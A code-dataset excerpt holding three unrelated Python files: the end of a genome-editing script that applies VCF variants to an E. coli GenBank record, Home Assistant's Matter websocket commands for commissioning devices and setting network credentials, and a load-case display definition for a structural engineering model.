self.manual_updates_filepath = manual_updates_filepath
# Object used to track the dynamically changing interval mapping
# positions in the original genome record with respect to which
# vcf positions were identified to the most up-to-date genome.
self.runtime_liftover = RuntimeLiftover(self.original_genome_record)
def run(self, verbose=False, log_file=None):
"""Performs the actual updating.
"""
# Manually add annotations for TAG.
add_TAG_annotations(self.genome_record)
# Add changes made manually.
if self.manual_updates_filepath:
if verbose: print '...Handling manual updates...'
self.handle_manual_updates()
if verbose: print '...Done handling manual updates.'
# Extra data to add to features.
position_to_data_map = get_vcf_metadata()
# Keep track of which vcf changes were actually made.
vcf_positions_updated = []
if verbose: print 'Handling vcf...'
with open(self.vcf_path) as vcf_fh:
vcf_reader = vcf.Reader(vcf_fh)
sample_index = vcf_reader.samples.index(self.sample_id)
for idx, record in enumerate(vcf_reader):
if verbose: print idx, record
# metadata = position_to_data_map.get(record.POS, None)
metadata = None
was_change_made = self.handle_vcf_record(
record, sample_index, metadata)
assert isinstance(was_change_made, bool), (
"handle_vcf_record() must return a boolean.")
if was_change_made:
vcf_positions_updated.append(record.POS)
# Write debug output for which changes were actually made.
if log_file:
with open(log_file, 'w') as log_fh:
for pos in vcf_positions_updated:
log_fh.write(str(pos) + '\n')
def handle_manual_updates(self):
"""Adds manual updates from an external file with the following
tab-separated fields:
* Cassette
* Comment
* LP
* RP
* Sequence
"""
assert self.manual_updates_filepath, "No manual updates specified."
with open(self.manual_updates_filepath) as fh:
line = fh.readline() # Skip the header.
line = fh.readline()
while line:
# Parse the arguments.
args = line.split('\t')
if not len(args) >= 3:
line = fh.readline()
continue
fix_id = args[0]
note = args[1]
left_bp = int(args[2].strip())
right_bp = int(args[3].strip())
if len(args) == 5 and len(args[4].strip()):
seq = args[4].strip()
else:
seq = None
# Process the args to get the data necessary to make the update.
pythonic_start = left_bp - 1
pythonic_end = right_bp - 1
ref = str(self.original_genome_record.seq[
pythonic_start:pythonic_end])
if seq:
alt = seq
else:
alt = ''
# Make the update for this record.
self._update_genome_record_for_variant(
pythonic_start, ref, alt, note)
# Continue to next line.
line = fh.readline()
# def add_cassette_modifications(self, cassette_modifications_csv):
# """Method that allows adding modifications to a cassette relative
# to the starting position of the cassette.
# This might be desired where the cassettes come from some canonical
# source, but in the current context they have modifications.
# Args:
# cassette_modifications_csv: List of modifications to make, described
# with the following columns:
# * cassette_id: Unique id for the cassette as provided in the
# manual updates file.
# * comment
# * position: 1-based index of the mutation start.
# * ref: What was there previously.
# * alt: The alternate value for the position. Currently in
# vcf output format with square brackets.
# """
# with open(variant_data_csv) as csv_fh:
# csv_reader = csv.DictReader(csv_fh)
# for row in csv_reader:
# pass
def update_from_variant_data_csv(self, variant_data_csv):
"""Updates the genome given a list of variants in a csv.
Args:
variant_data_csv: Path to .csv file containing the following cols:
Required:
* position - Position in the starting genome.
* ref - Reference sequence at that position.
* alt - The alternative to replace with.
Optional:
* note - A note to add to the data.
"""
with open(variant_data_csv) as csv_fh:
csv_reader = csv.DictReader(csv_fh)
for row in csv_reader:
pythonic_start = int(row['position']) - 1
ref = row['ref']
# NOTE: Hacky way of parsing that works for the way that
# our particular data looks.
alt = row['alt'][1:-1]
if 'note' in row:
note = row['note']
else:
note = None
# Make the update for this record.
self._update_genome_record_for_variant(
pythonic_start, ref, alt, note=note)
def handle_vcf_record(self, record, sample_index, metadata=None):
"""Decides what to do with a single VCF call.
"""
# The specific sample for this record.
# NOTE: The vcf may have been generated across many samples at the
# same time but this script only operates on a single sample.
sample = record.samples[sample_index]
# If not called, then nothing to do.
if not sample.called:
return False
# Get the reference and alternate for this call.
# NOTE: We reduce generality from what pyvcf since we are dealing
# with a single sample.
phase_char = sample.gt_phase_char()
alts = sample.gt_bases.split(phase_char)
# TODO: Figure out proper way to handle homozygous vs heterozygous.
# assert len(set(alts)) == 1, (
# "Error while processing %s.\n"
# "We presently only support homozygous calls" %
# (str(record)))
# HACK: For now, if we see a record that we should handle, we
# assume that we should take the first alt that is different than
# the ref.
ref = record.REF
for alt_candidate in alts:
alt = alt_candidate
if alt == ref:
continue
pythonic_position = record.POS - 1
try:
return self._update_genome_record_for_variant(
pythonic_position, ref, alt, metadata=metadata)
except AssertionError as e:
raise AssertionError(
"AssertionError while fixing record %s\n%s" % (
str(record), str(e)))
def _update_genome_record_for_variant(self, pythonic_position, ref, alt,
note=None, metadata=None):
"""Updates self.genome_record with the passed in data.
Logic extracted into own method for testing.
"""
ref = ref.upper()
alt = alt.upper()
if ref == alt:
# Nothing to do.
return False
# First, check whether the genome already looks like what it would
# after the variant is fixed. We do this by fake-removing the ref
# and adding the alt.
# NOTE: One specific case that causes this issue is when we are
# manually making the TAG changes before applying the rest of the
# variants called in the VCF. This may bite us down the road, but this
# whole script should probably be re-written in the near future.
first_base_position = (
self.runtime_liftover.convert_source_position_to_target(
pythonic_position, or_next=True))
fake_seq = str(
self.genome_record.seq[:first_base_position] +
alt +
self.genome_record.seq[first_base_position + len(ref):])
if (fake_seq == str(self.genome_record.seq)):
# Nothing to do.
return False
# The reason we don't just switch out the sequence above is that
# we need to get the annotations right.
# NOTE: Or is the above actually a more elegant way to do what follows?
# Now determine the kind of mutation.
if _is_snp(ref, alt):
return self.handle_snp({
'position': pythonic_position,
'ref': ref,
'alt': alt
}, metadata=metadata)
elif _is_deletion(ref, alt):
deleted_subseq = _get_deletion(ref, alt)
deleted_subseq_index_start = ref.rindex(deleted_subseq)
assert len(deleted_subseq) == len(ref) - deleted_subseq_index_start
deleted_subseq_start = (pythonic_position +
deleted_subseq_index_start)
return self.handle_deletion({
'interval': (deleted_subseq_start,
deleted_subseq_start + len(deleted_subseq)),
'validation_seq': deleted_subseq
}, note=note, metadata=metadata)
elif _is_insertion(ref, alt):
insertion_seq = _get_insertion(ref, alt)
alt_insertion_start_index = alt.rindex(insertion_seq)
assert len(insertion_seq) == len(alt) - alt_insertion_start_index, (
"Error handling insertion: ref: %s, alt: %s, position: d" %
(ref, alt, pythonic_position))
insertion_start = pythonic_position + alt_insertion_start_index
return self.handle_insertion({
'position': insertion_start,
'sequence': insertion_seq
}, note=note, metadata=metadata)
else:
# Since we can't exactly tell, just delete ref and insert alt.
validation_seq = str(self.original_genome_record.seq[
pythonic_position:pythonic_position + len(ref)])
self.handle_deletion({
'interval': (pythonic_position,
pythonic_position + len(ref)),
'validation_seq': validation_seq
}, add_annotation=False)
self.handle_insertion({
'position': pythonic_position,
'sequence': alt
}, add_annotation=False)
#### Calculate data for the annotation.
# The source interval is the interval that was removed
# from the source.
source_interval = (pythonic_position, pythonic_position + len(ref))
# The insertion is not mapped in the liftover after the insertion,
# so grab the starting position.
target_genome_start = (
self.runtime_liftover.convert_source_position_to_target(
pythonic_position - 1, or_next=True) + 1)
feature_id = 'misc_variant_source_%d-%d' % source_interval
feature_location = FeatureLocation(
target_genome_start,
target_genome_start + len(alt))
feature = SeqFeature(
type=VARIANT_ANNOTATION_TYPE,
location=feature_location,
strand=1,
id=feature_id
)
if len(ref) <= MAX_REPLACE_CHARS:
feature.qualifiers['replace'] = ref.lower()
else:
feature.qualifiers['replace'] = '%d base replacement' % len(ref)
if note:
feature.qualifiers['note'] = note
if metadata:
for key, value in metadata.iteritems():
if value:
feature.qualifiers[key] = value
add_feature_to_seq_record(self.genome_record, feature)
return True
def handle_snp(self, variant_data, add_annotation=True, note=None,
metadata=None):
"""Handle a single nucleotide position change.
"""
source_snp_position = variant_data['position']
ref_base = variant_data['ref']
alt_base = variant_data['alt']
snp_size = 1
# First, translate the position to the frame of the updated genome.
snp_position = (
self.runtime_liftover.convert_source_position_to_target(
source_snp_position))
if not snp_position:
# Nothing to do. This exact position has probably been deleted.
return False
# Make sure the ref is what is expected. This is a non-thorough
# but reasonable and bug check.
assert ref_base == self.genome_record.seq[snp_position], (
"Error fixing SNP at "
"source position %d, "
"target position %d, "
"Expected: %s, observed: %s" % (
source_snp_position, snp_position, ref_base,
self.genome_record.seq[snp_position]))
new_seq = (
self.genome_record.seq[:snp_position] +
alt_base +
self.genome_record.seq[snp_position + 1:])
self.genome_record.seq = new_seq
if add_annotation:
# Add feature marking SNP.
snp_feature_location = FeatureLocation(
snp_position, snp_position + snp_size)
snp_feature_id = 'snp_source_%d_%s_to_%s' % (
source_snp_position, ref_base, alt_base)
snp_feature = SeqFeature(
type=VARIANT_ANNOTATION_TYPE,
location=snp_feature_location,
strand=1,
id=snp_feature_id
)
snp_feature.qualifiers['replace'] = ref_base.lower()
if note:
snp_feature.qualifiers['note'] = note
if metadata:
for key, value in metadata.iteritems():
if value:
snp_feature.qualifiers[key] = value
add_feature_to_seq_record(self.genome_record, snp_feature)
# Change as made.
return True
def handle_insertion(self, variant_data, add_annotation=True, note=None,
metadata=None):
"""Handles an insertion at the position relative to the original
genome.
Args:
variant_data: Dictionary with keys:
* position: Pythonic position for the insertion relative
to the original genome record.
* sequence: The sequence being inserted. One or more bases.
"""
source_position = variant_data['position']
seq = variant_data['sequence']
# First, translate the position to the frame of the updated genome.
target_genome_position = (
self.runtime_liftover.convert_source_position_to_target(
source_position, or_next=True))
# Insert the sequence at the provided position.
insert_sequence_and_update_features(self.genome_record, seq,
target_genome_position, extend_feature_ends=True)
# Update the liftover interval mapping.
self.runtime_liftover.handle_insertion(variant_data)
if add_annotation:
# Add a feature annotating the insertion.
feature_id = 'insertion_source_%s' % (source_position,)
feature_location = FeatureLocation(target_genome_position,
target_genome_position + len(seq))
feature = SeqFeature(
type=VARIANT_ANNOTATION_TYPE,
location=feature_location,
strand=1,
id=feature_id
)
# TODO: This doesn't work with the .tbl format.
# Figure out how to fix this.
# feature.qualifiers['replace'] = ''
if note:
feature.qualifiers['note'] = note
if metadata:
for key, value in metadata.iteritems():
if value:
feature.qualifiers[key] = value
add_feature_to_seq_record(self.genome_record, feature)
# Change as made.
return True
def handle_deletion(self, variant_data, add_annotation=True, note=None,
metadata=None):
"""Handles a deletion.
After this operation, the genome_record reflects the deletion.
Args:
variant_data: Dictionary with keys:
* interval: A two-tuple representing pythonic interval for the
deletion, i.e. (inclusive_start, exclusive_end).
e.g. (100, 102) is a deletion of the 2 bases at positions
100 and 101.
* validation_seq: If provided, used to validate that the
interval being deleted is this sequence.
"""
interval = variant_data['interval']
# Inclusive-bounds interval for the target.
target_genome_interval = [
self.runtime_liftover.convert_source_position_to_target(
bound, or_next=True)
for bound in (interval[0], interval[1] - 1)]
assert (bases_in_interval(target_genome_interval) ==
interval[1] - interval[0])
target_genome_interval_pythonic = (
target_genome_interval[0],
target_genome_interval[1] + 1)
delete_interval(self.genome_record, target_genome_interval_pythonic,
validation_seq=variant_data.get('validation_seq', None))
# Update the liftover mapping.
self.runtime_liftover.handle_deletion({
'interval': interval
})
if add_annotation:
# Add a feature annotating the deletion.
# Calculate the target genome interval for the annotation.
# Annotate from the position before the deletion to the position
# after.
target_genome_interval_after_deletion = [
self.runtime_liftover.convert_source_position_to_target(
bound, or_next=True)
for bound in (interval[0] - 1, interval[1])]
feature_id = 'deletion_source_%d-%d' % (
interval[0], interval[1])
feature_location = FeatureLocation(
target_genome_interval_after_deletion[0],
target_genome_interval_after_deletion[1])
feature = SeqFeature(
type=VARIANT_ANNOTATION_TYPE,
location=feature_location,
strand=1,
id=feature_id
)
ref = variant_data.get('validation_seq', '')
if len(ref) <= MAX_REPLACE_CHARS:
feature.qualifiers['replace'] = ref.lower()
else:
feature.qualifiers['replace'] = '%d base deletion' % len(ref)
feature.qualifiers['source_deletion_interval'] = str(interval)
if note:
feature.qualifiers['note'] = note
if metadata:
for key, value in metadata.iteritems():
if value:
feature.qualifiers[key] = value
add_feature_to_seq_record(self.genome_record, feature)
# Change as made.
return True
###############################################################################
# Main procedure entrypoint
###############################################################################
def run(original_genbank_path, output_root, vcf_path, sample_id,
**kwargs):
"""Creates a modified genbank file starting from the original genbank
and applying the changes indicated in the vcf file.
Args:
original_genbank_path: Path to the original genbank file.
output_root: Root of filename, without extension. The extension
will be appended to the name depending on the output type.
vcf_path: Path to the vcf file.
sample_id: Id of the targete in the vcf, e.g. recoli_misq_c31_321D.
kwargs: Optional keyword args. Supported keys:
* liftover_pickle_dest: The output file to write the pickled
liftover interval mapping to.
* output_format: One of 'fasta' or 'genbank'. Defaults to
'genbank'.
* variant_data_csv: If included, will use
update_from_variant_data_csv() rather than standard run.
* verbose: Toggle for amount of informative print statements during
processing.
Returns:
The final SeqRecord that was also written to output.
"""
# Strategy:
# Iterate through the calls in the VCF file and incrementally
# update the genome record. There are tricky subtleties including:
# * The frame of the target genome is constantly changing.
# Nuances: When adding insertions/deletions, this may shift the overall
# frame of the genome downstream from that particular position. We need a
# liftover-like intermediate representation that allows us
# to keep track of these accumulated shifts. For example, every successive
# change that we want to make should have its position updated using
# this method. That way, the annotation can potentially preserve the
# position of the SNP relative to the original record, but we can
# introduce the changes into the underlying sequence and update all
# features appropriately.
if isinstance(original_genbank_path, SeqRecord):
genome_record = original_genbank_path
else:
# Read in the original genome.
genome_record = SeqIO.read(original_genbank_path, 'genbank')
# Get optional manual updates file.
if 'manual_updates_filepath' in kwargs:
manual_updates_filepath = kwargs['manual_updates_filepath']
else:
manual_updates_filepath = None
# Create the object that encapsulates most of the calculation.
vcf_to_genbank_maker = VCFToGenbankMaker(genome_record, vcf_path,
sample_id, manual_updates_filepath)
if 'variant_data_csv' in kwargs:
vcf_to_genbank_maker.update_from_variant_data_csv(
kwargs['variant_data_csv'])
else:
vcf_to_genbank_maker.run(
verbose=kwargs.get('verbose', False),
log_file=kwargs.get('log_file', None))
# Write the final result.
DEFAULT_OUTPUT_FORMAT = 'genbank'
output_format = kwargs.get('output_format', DEFAULT_OUTPUT_FORMAT)
output_path = output_root + '.' + output_format
SeqIO.write(genome_record, output_path, output_format)
# Optional: Pickle the liftover interval mappings.
if 'liftover_pickle_dest' in kwargs:
vcf_to_genbank_maker.runtime_liftover.pickle_interval_mapping(
kwargs['liftover_pickle_dest'])
return genome_record
###############################################################################
# Helpers to evaluate SNP type.
###############################################################################
def _is_snp(ref, alt):
return len(ref) == 1 and alt in ['A', 'T', 'G', 'C']
def _is_deletion(ref, alt):
return _get_deletion(ref, alt) is not None
def _get_deletion(ref, alt):
"""Extracts the portion of ref that is deleted relative to alt.
Returns None if no valid deletion found.
"""
if len(ref) <= len(alt):
return None
if len(alt) == 0:
return ref
# Make sure they are both uppercase for matching procedure below.
ref = ref.upper()
alt = alt.upper()
# Step through the two simultaneously until the first mismatch.
idx = 0
while idx < len(alt):
if ref[idx] != alt[idx]:
break
idx += 1
if idx < len(alt):
# Our definition of deletion requirex the entire alt to be matched.
return None
deletion = ref[idx:]
if not deletion:
return None
return deletion
def _is_insertion(ref, alt):
return _get_insertion(ref, alt) is not None
def _get_insertion(ref, alt):
"""Extracts the portion of alt that inserted relative to alt.
"""
# Just call _get_deletion with params reversed.
return _get_deletion(alt, ref)
###############################################################################
# Other utility methods
###############################################################################
def create_filtered_vcf(vcf_path, out_vcf_path, csv_with_pos_to_keep):
"""Filters the passed in vcf down to the variant calls that we actually
want to add to the updated genbank file.
Writes the results to out_vcf_path.
The reason for this method that cleans up the vcf, rather than just
using the csv directly is that the logic for going from vcf to genbank
will hopefully be re-usable, so we might as take a first stab at it here.
"""
# Positions uniquely identify SNPs (manually confirmed). The provided
# csv file should only have SNPs that we are keeping.
positions_to_keep = set([])
with open(csv_with_pos_to_keep) as csv_fh:
csv_reader = csv.DictReader(csv_fh)
for row in csv_reader:
positions_to_keep.add(int(row['POS']))
# Now create a filtered a vcf with only the above positions.
with open(vcf_path) as vcf_fh, open(out_vcf_path, 'w') as out_vcf_fh:
vcf_reader = vcf.Reader(vcf_fh)
vcf_writer = vcf.Writer(out_vcf_fh, vcf_reader)
for record in vcf_reader:
if record.POS in positions_to_keep:
vcf_writer.write_record(record)
def add_TAG_annotations(genome_record):
"""Temporary method for adding our UAG mutations manually.
Mutates the passed in genome_record by adding features for the
amber SNPs.
"""
TAG_ANNOTATION_TYPE = VARIANT_ANNOTATION_TYPE
UAG_LOCATIONS_FILE = os.path.join(
GENOMES_DIR, 'mg1655', 'mg1655_uag_locations.csv')
# Import the list of UAG locations and make the positions 0-indexed
# to be consistent with the BioPython convention.
uag_location_list = []
with open(UAG_LOCATIONS_FILE) as fh:
fh.readline() # Drop the first line
for line in fh.readlines():
uag_location_list.append(int(line.strip()) - 1)
uag_location_list = sorted(uag_location_list)
for current_uag_position in uag_location_list:
current_base = genome_record.seq[current_uag_position]
if current_base == 'G':
alt_base = 'A'
feature_location = FeatureLocation(
current_uag_position - 2,
current_uag_position + 1)
feature_strand = 1
elif current_base == 'C':
alt_base = 'T'
feature_location = FeatureLocation(
current_uag_position,
current_uag_position + 3)
feature_strand = -1
else:
raise AssertionError("Invalid base at position %d: %s" % (
current_uag_position, current_base))
# Update the sequence.
new_seq = (
genome_record.seq[:current_uag_position] +
alt_base +
genome_record.seq[current_uag_position + 1:])
genome_record.seq = new_seq
# Add a feature annotation.
feature_id = 'remove_uag_%d' % current_uag_position
feature = SeqFeature(
type=TAG_ANNOTATION_TYPE,
location=feature_location,
strand=feature_strand,
id=feature_id
)
feature.qualifiers['replace'] = 'tag'
feature.qualifiers['note'] = 'Reassigning UAG'
add_feature_to_seq_record(genome_record, feature)
def get_vcf_metadata():
"""Returns a dictionary with keys being SNP positions and values
being the data from DBG's analysis with SnpEFF etc.
"""
VARIANT_METADATA = os.path.join(REC1_C321D_ROOT, 'rec1_c321d_snps.csv')
position_to_data_map = {}
with open(VARIANT_METADATA) as csv_fh:
csv_reader = csv.DictReader(csv_fh)
for row in csv_reader:
position_to_data_map[int(row['POS'])] = {
'EFF_AA': row['EFF_AA'],
'EFF_CODON': row['EFF_CODON'],
'EFF_FUNC': row['EFF_FUNC'],
'EFF_SEV': row['EFF_SEV'],
}
return position_to_data_map
###############################################################################
# Testing and scripting
###############################################################################
if __name__ == '__main__':
MG1655_GENBANK = os.path.join(GENOMES_DIR, 'mg1655', 'mg1655.genbank')
RECOLI_ALL_SNPS = os.path.join(REC1_C321D_ROOT, 'recoli_all_snps.vcf')
C321D_SNPS_VCF = os.path.join(REC1_C321D_ROOT, 'rec1_c321d_snps.vcf')
REC1_C321D_SAMPLE_ID = 'recoli_misq_c31_321D'
REC1_C321D_OUTPUT_ROOT = os.path.join(REC1_C321D_ROOT, 'rec1_c321d')
REC1_C321D_PRELIM_OUTPUT_ROOT = os.path.join(REC1_C321D_ROOT,
'rec1_c321d.preliminary')
PICKLE_DEST = os.path.join(REC1_C321D_ROOT, 'rec1_c321d_liftover.pickle')
MANUAL_UPDATES = os.path.join(REC1_C321D_ROOT, 'rec1_c321d_manual_fixes.txt')
# # First filter the edits that we actually want to keep.
# # TODO: Make the run() method take as an optional argument a user-specified
# # argument for filtering which vcf rows are incorporated into the Genbank.
# CSV_WITH_POS_TO_KEEP = os.path.join(REC1_C321D_ROOT, 'rec1_c321d_snps.csv')
# create_filtered_vcf(RECOLI_ALL_SNPS, C321D_SNPS_VCF, CSV_WITH_POS_TO_KEEP)
# Now run the genbank creator.
kwargs = {
'liftover_pickle_dest': PICKLE_DEST,
'manual_updates_filepath': MANUAL_UPDATES,
'output_format': 'genbank',
'verbose': True
}
run(MG1655_GENBANK, REC1_C321D_OUTPUT_ROOT, C321D_SNPS_VCF,
REC1_C321D_SAMPLE_ID, **kwargs)
### Developing manual updates
# REC1_C321D_MANUAL_ONLY_OUT = os.path.join(REC1_C321D_ROOT,
# 'rec1_c321d_manual_only.genbank')
# genome_record = SeqIO.read(MG1655_GENBANK, 'genbank')
# vcf_to_genbank_maker = VCFToGenbankMaker(genome_record, None,
# None, MANUAL_UPDATES)
# vcf_to_genbank_maker.handle_manual_updates()
# SeqIO.write(genome_record, REC1_C321D_MANUAL_ONLY_OUT, 'genbank')
### Developing chain file output.
# runtime_liftover = RuntimeLiftover(genome_record)
# runtime_liftover.pickle_interval_mapping(PICKLE_DEST)
# print runtime_liftover._interval_mapping
# CHAIN_FILE_DEST = os.path.join(GENOMES_DIR, 'mg1655.to.rec1_c321d.chain')
# runtime_2 = RuntimeLiftover.from_pickled_intervals(
# [], PICKLE_DEST)
# runtime_2.write_chain_file(CHAIN_FILE_DEST)
### Generating source genome positions for c321D Genbank SNPs
# OUT_CSV_FIELD_NAMES = ['position', 'ref', 'alt', 'mg1655_position']
# REALIGNED_SNPS_IN = os.path.join(REC1_C321D_ROOT, 'realignment_snps.csv')
# REALIGNED_SNPS_WITH_MG1655_POS = os.path.join(
# REC1_C321D_ROOT, 'realignment_snps_with_mg1655_positions.csv')
# MG1655_GENOME_RECORD = SeqIO.read(MG1655_GENBANK, 'genbank')
# runtime_liftover_obj = RuntimeLiftover.from_pickled_intervals(
# MG1655_GENOME_RECORD, PICKLE_DEST)
# with open(REALIGNED_SNPS_WITH_MG1655_POS, 'w') as out_csv_fh:
# csv_writer = csv.DictWriter(out_csv_fh, OUT_CSV_FIELD_NAMES)
# csv_writer.writeheader()
# with open(REALIGNED_SNPS_IN) as in_csv_fh:
# csv_reader = csv.DictReader(in_csv_fh)
# for row in csv_reader:
# out_row = copy.copy(row)
# # Convert the position. Note the indexing correction.
# c321d_position_pythonic = int(row['position']) - 1
# mg1655_position_pythonic = (
# runtime_liftover_obj.convert_target_position_to_source(
# c321d_position_pythonic))
# if mg1655_position_pythonic is not None:
# # Validation check that the base at that position is
# # correct.
# assert row['ref'][0] == (
# runtime_liftover_obj.source_genome_record.seq[
# mg1655_position_pythonic])
# # Make the position one-indexed to be consistent
# # with the vcf standard.
# mg1655_position = mg1655_position_pythonic + 1
# else:
# mg1655_position = None
# out_row['mg1655_position'] = mg1655_position
# csv_writer.writerow(out_row)
| [
"[email protected]"
] | |
4261205d147bd377b81a8fb578bf7586b1f999d2 | 296132d2c5d95440b3ce5f4401078a6d0f736f5a | /homeassistant/components/matter/api.py | 36cf83fd0dab7563414b7bed72aa10b48494fe9e | [
"Apache-2.0"
] | permissive | mezz64/home-assistant | 5349a242fbfa182159e784deec580d2800173a3b | 997d4fbe5308b01d14ceabcfe089c2bc511473dd | refs/heads/dev | 2023-03-16T22:31:52.499528 | 2022-12-08T02:55:25 | 2022-12-08T02:55:25 | 68,411,158 | 2 | 1 | Apache-2.0 | 2023-03-10T06:56:54 | 2016-09-16T20:04:27 | Python | UTF-8 | Python | false | false | 4,458 | py | """Handle websocket api for Matter."""
from __future__ import annotations
from collections.abc import Callable
from functools import wraps
from typing import Any
from matter_server.client.exceptions import FailedCommand
import voluptuous as vol
from homeassistant.components import websocket_api
from homeassistant.components.websocket_api import ActiveConnection
from homeassistant.core import HomeAssistant, callback
from .adapter import MatterAdapter
from .const import DOMAIN
ID = "id"
TYPE = "type"
@callback
def async_register_api(hass: HomeAssistant) -> None:
"""Register all of our api endpoints."""
websocket_api.async_register_command(hass, websocket_commission)
websocket_api.async_register_command(hass, websocket_commission_on_network)
websocket_api.async_register_command(hass, websocket_set_thread_dataset)
websocket_api.async_register_command(hass, websocket_set_wifi_credentials)
def async_get_matter_adapter(func: Callable) -> Callable:
"""Decorate function to get the MatterAdapter."""
@wraps(func)
async def _get_matter(
hass: HomeAssistant, connection: ActiveConnection, msg: dict
) -> None:
"""Provide the Matter client to the function."""
matter: MatterAdapter = next(iter(hass.data[DOMAIN].values()))
await func(hass, connection, msg, matter)
return _get_matter
def async_handle_failed_command(func: Callable) -> Callable:
"""Decorate function to handle FailedCommand and send relevant error."""
@wraps(func)
async def async_handle_failed_command_func(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
*args: Any,
**kwargs: Any,
) -> None:
"""Handle FailedCommand within function and send relevant error."""
try:
await func(hass, connection, msg, *args, **kwargs)
except FailedCommand as err:
connection.send_error(msg[ID], err.error_code, err.args[0])
return async_handle_failed_command_func
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "matter/commission",
vol.Required("code"): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_commission(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
matter: MatterAdapter,
) -> None:
"""Add a device to the network and commission the device."""
await matter.matter_client.commission_with_code(msg["code"])
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "matter/commission_on_network",
vol.Required("pin"): int,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_commission_on_network(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
matter: MatterAdapter,
) -> None:
"""Commission a device already on the network."""
await matter.matter_client.commission_on_network(msg["pin"])
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "matter/set_thread",
vol.Required("thread_operation_dataset"): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_set_thread_dataset(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
matter: MatterAdapter,
) -> None:
"""Set thread dataset."""
await matter.matter_client.set_thread_operational_dataset(
msg["thread_operation_dataset"]
)
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "matter/set_wifi_credentials",
vol.Required("network_name"): str,
vol.Required("password"): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_set_wifi_credentials(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
matter: MatterAdapter,
) -> None:
"""Set WiFi credentials for a device."""
await matter.matter_client.set_wifi_credentials(
ssid=msg["network_name"], credentials=msg["password"]
)
connection.send_result(msg[ID])
| [
"[email protected]"
] | |
bd91cb8c7e9e1344cfd7f3d1410c23d658e9438d | ba054fa1ec409011444e9c6b963309745e150d6f | /ps_bole_calculs_statiques/xc_model_impact/loadStateData.py | 69e20459fe07531c2303bcc316ffa946b24e867d | [] | no_license | berndhahnebach/XCmodels | a6500fdde253dea10ef2bb64b7ebc3dbfc2577c2 | 4acdd7747abd7cd71f5ef580f65e93359560e5a9 | refs/heads/master | 2020-04-02T23:36:36.385054 | 2018-10-20T16:49:21 | 2018-10-20T16:49:21 | 154,873,006 | 0 | 0 | null | 2018-10-26T17:52:36 | 2018-10-26T17:52:35 | null | UTF-8 | Python | false | false | 5,140 | py | # -*- coding: utf-8 -*-
'''In this script we define default data of load cases to be used (or changed)
while displaying loads or results associated to single load cases
'''
from postprocess.reports import graphical_reports
'''
Definition of record objects with these attributes:
loadCaseName: name of the load case to be depicted
loadCaseDescr: description text of the load case
loadCaseExpr: mathematical expression to define the load case (ex:
'1.0*GselfWeight+1.0*DeadLoad')
setsToDispLoads: ordered list of sets of elements to display loads
setsToDispBeamLoads: ordered list of sets of beam elements to display loads
(defaults to [])
compElLoad: component of load on beam elements to be represented
available components: 'axialComponent', 'transComponent',
'transYComponent','transZComponent'
unitsScaleLoads: factor to apply to loads if we want to change
the units (defaults to 1).
unitsLoads: text to especify the units in which loads are
represented (defaults to 'units:[m,kN]')
vectorScaleLoads: factor to apply to the vectors length in the
representation of loads (defaults to 1 -> auto-scale).
vectorScalePointLoads: factor to apply to the vectors length in the
representation of nodal loads (defaults to 1).
multByElemAreaLoads: boolean value that must be True if we want to
represent the total load on each element
(=load multiplied by element area) and False if we
are going to depict the value of the uniform load
per unit area (defaults to False)
listDspRot: ordered list of displacement or rotations to be displayed
available components: 'uX', 'uY', 'uZ', 'rotX', rotY', 'rotZ'
(defaults to ['uX', 'uY', 'uZ'])
setsToDispDspRot: ordered list of sets of elements to display displacements
or rotations
unitsScaleDispl: factor to apply to displacements if we want to change
the units (defaults to 1).
unitsDispl: text to especify the units in which displacements are
represented (defaults to '[m]'
listIntForc: ordered list of internal forces to be displayed as scalar field
over «shell» elements
available components: 'N1', 'N2', 'M1', 'M2', 'Q1', 'Q2'
(defaults to ['N1', 'N2', 'M1', 'M2', 'Q1', 'Q2'])
setsToDispIntForc: ordered list of sets of elements (of type «shell»)to
display internal forces
listBeamIntForc: ordered list of internal forces to be displayed
as diagrams on lines for «beam» elements
available components: 'N', 'My', 'Mz', 'Qy', 'Qz','T'
(defaults to ['N', 'My', 'Mz', 'Qy', 'Qz','T'])
setsToDispBeamIntForc: ordered list of sets of elements (of type «beam»)to
display internal forces (defaults to [])
scaleDispBeamIntForc: tuple (escN,escQ,escM) correponding to the scales to
apply to displays of, respectively, N Q and M beam internal
forces (defaults to (1.0,1.0,1.0))
unitsScaleForc: factor to apply to internal forces if we want to change
the units (defaults to 1).
unitsForc: text to especify the units in which forces are
represented (defaults to '[kN/m]')
unitsScaleMom: factor to apply to internal moments if we want to change
the units (defaults to 1).
unitsMom: text to especify the units in which bending moments are
represented (defaults to '[kN.m/m]')
viewName: name of the view that contains the renderer (available standard
views: "XYZPos", "XYZNeg", "XPos", "XNeg","YPos", "YNeg",
"ZPos", "ZNeg", "+X+Y+Z", "+X+Y-Z", "+X-Y+Z", "+X-Y-Z",
"-X+Y+Z", "-X+Y-Z",
"-X-Y+Z", "-X-Y-Z") (defaults to "XYZPos")
hCamFct: factor that applies to the height of the camera position
in order to change perspective of isometric views
(defaults to 1, usual values 0.1 to 10)
viewNameBeams: name of the view for beam elements displays (defaults to "XYZPos")
hCamFctBeams: factor that applies to the height of the camera position for
beam displays (defaults to 1)
'''
A1=graphical_reports.RecordLoadCaseDisp(loadCaseName='A1',loadCaseDescr='A1: impact on parapet head',loadCaseExpr='1.0*A1',setsToDispLoads=[totalSet],setsToDispDspRot=[shells],setsToDispIntForc=[totalSet])
A1.unitsScaleLoads= 1e-3
A1.unitsScaleForc= 1e-3
A1.unitsScaleMom= 1e-3
A1.unitsScaleDispl= 1e3
A1.viewName= "-X+Y+Z"
